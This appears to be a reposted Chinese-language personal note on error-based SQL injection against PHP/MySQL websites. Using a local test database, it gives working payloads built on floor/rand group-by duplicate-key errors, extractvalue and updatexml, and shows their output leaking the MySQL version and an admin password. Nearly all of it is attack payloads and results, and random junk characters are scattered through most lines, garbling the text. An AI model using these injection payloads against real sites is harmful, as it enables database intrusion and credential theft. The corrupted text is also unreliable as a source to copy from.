放点原来的笔记,Mysql在执行语句的时候会抛出异常信息信息,而php+mysql架构的网站往往又将错误代码显示在页面上,这样可以通过构造如下三种方法获取特定数据。2 u) o4 k7 P. m+ t# j
实际测试环境:2 ^$ o1 I3 y8 L' N, \/ r, {& e3 K% t
4 f3 s( K) g2 d, c
0 p% l1 [* }$ w/ L O
mysql> show tables;) e- |$ M U# \# J4 m r
+----------------+
/ M- j8 b ^7 ?- R) d7 M| Tables_in_test |
, T9 `' W2 |7 J+----------------+" L5 j5 u' U" h# m
| admin |* `9 P3 R# S- ~& S
| article |( H, p* ~8 o- c
+----------------+
4 q7 {1 I/ Z5 n; c
) Y+ R u- X8 j0 k, C m! Y 3 [ G! E+ s$ p ^+ q# ^4 L, _ \
4 q: M0 n* e7 }9 R6 m% G
mysql> describe admin;
4 E( N' x( D7 P3 [, z4 r( Y9 e+-------+------------------+------+-----+---------+----------------+) V* r. e2 D0 ]' i2 r9 p
| Field | Type | Null | Key | Default | Extra |, R% o, ~& @4 C: i" x
+-------+------------------+------+-----+---------+----------------+
9 j4 t# ^1 H$ V7 V6 ?1 b| id | int(10) unsigned | NO | PRI | NULL | auto_increment |
# V$ v# ^6 u7 N5 C| user | varchar(50) | NO | | NULL | |
8 c" N4 r/ \( j| pass | varchar(50) | NO | | NULL | |4 B2 M- v( V) ?5 P# i, V$ r+ G
+-------+------------------+------+-----+---------+----------------+
3 Q$ B7 i E2 y" K: a( a8 v % w7 e3 h0 J0 P" ]
* `) ] Z( S# r; e) d2 j2 y
5 R6 I% Q- O5 g- P+ Imysql> describe article;# X0 d" w) A6 |
+---------+------------------+------+-----+---------+----------------+8 k. g4 e+ K& u
| Field | Type | Null | Key | Default | Extra |4 ?; y3 u$ ~8 ?0 e* t6 R( w
+---------+------------------+------+-----+---------+----------------+0 n2 m& @: X7 l& I% s% t
| id | int(10) unsigned | NO | PRI | NULL | auto_increment |9 `+ e( T+ d# v+ o
| title | varchar(50) | NO | | NULL | |
% }1 p1 S4 t4 R| content | varchar(50) | NO | | NULL | |
6 A2 c/ c) ]/ m+---------+------------------+------+-----+---------+----------------+
/ d; K9 E) h: d$ x$ g X2 d1、通过floor报错
, E/ u* Z. {( {- _7 k$ m3 w8 o可以通过如下一些利用代码
K) y& B/ q* r: [) z9 h+ `" V 3 f/ x- Y; H/ h, h: `. i/ b" g
7 P* O1 }& Y1 ?) s4 Q$ P
and select 1 from (select count(*),concat(version(),floor(rand(0)*2))x( _9 J7 _. V8 p- j2 b: P
from information_schema.tables group by x)a);' v5 A# S' S( B. t' Z0 g3 w/ O
- p5 x+ m. j- e* S1 Q+ q6 J8 x% ?' k
H, j. f5 b" d4 t' a& r3 o- wand (select count(*) from (select 1 union select null union select !1)x
4 U; i1 M. D0 rgroup by concat((select table_name from information_schema.tables limit 1),
) p7 Y4 o" h( D( afloor(rand(0)*2)));0 p) H) `. ]" F8 N
举例如下:
9 B q- D9 B d: S首先进行正常查询:
! K4 R. G5 I% V& a# {/ i0 l' C5 Q
4 G% M4 }3 A2 G3 \- ]8 Amysql> select * from article where id = 1;
0 k, E+ t9 `6 H+----+-------+---------++ ?* _' n2 y5 t, N) Q
| id | title | content |8 ~( ^+ T3 f* n! q$ w* h8 Y$ z" Y5 {
+----+-------+---------+$ `' C; k- ?' G- u" `8 ~
| 1 | test | do it |
7 p' I8 t0 [! n1 B0 A+----+-------+---------+& ?/ E" w. {; M( P' _& y7 F9 q4 ^
假如id输入存在注入的话,可以通过如下语句进行报错。
, i, b* {, @, k2 O
7 p* I6 K1 g+ ?- s
+ ]3 y" G3 ]1 p W" V9 @7 D& M' |7 {mysql> select * from article where id = 1 and (select 1 from
0 a' f9 D; G, c/ z5 A# Y2 M(select count(*),concat(version(),floor(rand(0)*2))x from information_schema.tables group by x)a);
+ r; [% j. {+ W4 JERROR 1062 (23000): Duplicate entry '5.1.33-community-log1' for key 'group_key'( d- ~+ K; F2 J+ P
可以看到成功爆出了Mysql的版本,如果需要查询其他数据,可以通过修改version()所在位置语句进行查询。 D2 U7 i' W/ A3 S& V7 v
例如我们需要查询管理员用户名和密码:
( X# L$ k- s8 ?9 |0 z$ @Method1:
- d" G6 l7 d1 Q8 \+ e9 _# N 8 v' z, `7 C% t
1 ?$ }3 G/ h' s5 rmysql> select * from article where id = 1 and (select 1 from
8 H& N( C& `2 k$ g1 @+ c(select count(*),concat((select pass from admin where id =1),floor(rand(0)*2))x& Q! ^" p% R7 e' p1 b1 o
from information_schema.tables group by x)a);
' V7 U8 ~! [+ D( SERROR 1062 (23000): Duplicate entry 'admin8881' for key 'group_key' t' b6 C. Z/ s( x
Method2:8 X: |# t' D* P1 I# k: k J
* Y7 Z! H3 w" t : I' S5 k) R+ e2 { g$ k
mysql> select * from article where id = 1 and (select count(*)
# c& |* F3 X+ K) kfrom (select 1 union select null union select !1)x group by concat((select pass from admin limit 1),* D8 l* _7 F& M' A q
floor(rand(0)*2)));
2 R2 a0 m( [, | b, J3 z" ?ERROR 1062 (23000): Duplicate entry 'admin8881' for key 'group_key'" P) h( M% L* @6 B, `! U! X
2、ExtractValue9 {2 B8 r4 \2 g9 c# G
测试语句如下
) C A# |6 \* t/ M ' E2 {5 E2 }# `" P7 q. g
0 T. W1 P* d" h0 pand extractvalue(1, concat(0x5c, (select table_name from information_schema.tables limit 1)));; ]+ I8 E" I7 e) D
实际测试过程4 b- f/ e* s2 k( S' ^
' ~- G- L: i& D3 \
7 r8 n* Y1 X3 Q0 k7 t9 i0 v: Umysql> select * from article where id = 1 and extractvalue(1, concat(0x5c,' n- G8 X3 m# A: @" U6 b
(select pass from admin limit 1)));--
3 r; l7 M) i( a1 d/ H2 c0 J9 hERROR 1105 (HY000): XPATH syntax error: '\admin888'0 N- |! a) F) \8 O! z2 M
3、UpdateXml
$ n: U2 g- q3 _, v测试语句5 E+ q9 T5 x) z+ _
4 s/ b; ^8 @) c/ y( D
" f! G; @! y9 O1 x; S0 u; J+ ]( Jand 1=(updatexml(1,concat(0x5e24,(select user()),0x5e24),1)), f( Z! i; }6 L( d4 w
实际测试过程$ b9 m( s+ m1 n+ ]
0 A! u" X7 l1 S: a4 b 3 z. f2 [7 W+ S
mysql> select * from article where id = 1 and 1=(updatexml(1,concat(0x5e24,! K5 ^ a# D; [1 Q' u* L" d
(select pass from admin limit 1),0x5e24),1));& c! U8 w; u# v; d( ^- T
ERROR 1105 (HY000): XPATH syntax error: '^$admin888^$'
( A" x; @* J3 Q. Y& {All, thanks foreign guys.- X' m) Y5 s* p
, ~! w/ @% p9 j5 t3 Y3 g1 p
8 l1 k t/ x1 {: I( O8 M
|